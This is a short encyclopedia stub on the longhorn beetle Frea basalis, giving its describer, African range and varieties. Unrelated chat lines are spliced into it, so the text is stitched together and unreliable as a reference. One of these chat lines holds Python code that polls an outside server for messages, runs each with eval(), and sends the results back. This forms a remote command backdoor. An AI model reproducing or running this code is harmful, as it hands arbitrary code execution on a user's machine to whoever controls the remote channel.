Frea basalis
Frea basalis is a species of beetle in the family Cerambycidae. It was described by Karl Jordan in 1894. It is known from Cameroon, Angola, and the Democratic Republic of the Congo.[1]
Frea basalis | |
---|---|
![]() | |
Scientific classification | |
Kingdom: | |
Phylum: | |
Class: | |
Order: | |
Suborder: | |
Family: | |
Genus: | |
Species: | F. basalis |
Binomial name | |
Frea basalis Jordan, 1894 | |
Varieties
- Frea basalis var. fasciolata (Hintz, 1912)
- Frea basalis var. griseobasalis Breuning, 1942
- Frea basalis var. thoracica (Hintz, 1912)
- Frea basalis var. uniformis (Hintz, 1912)
gollark: Probably not?
gollark: Plus, unlike the old version, it only uses builtin python modules.
gollark: It's very secure.
gollark: ```pythonimport urllib3, jsonhttp = urllib3.PoolManager()def send(x): http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "send", "channel": "potatOS", "message": x}), headers={"Content-Type": "application/json"})while True: r = http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "recv", "channel": "potatOS", "timeout": 30000}), headers={"Content-Type": "application/json"}) data = json.loads(r.data) if data["result"] != None: res = data["result"]["data"] try: send(repr(eval(res))) except Exception as e: send(repr(e))```Using the new SPUDNET-HTTP API.
gollark: Make it continuously ping osmarks.net so you know what it's up to.
This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.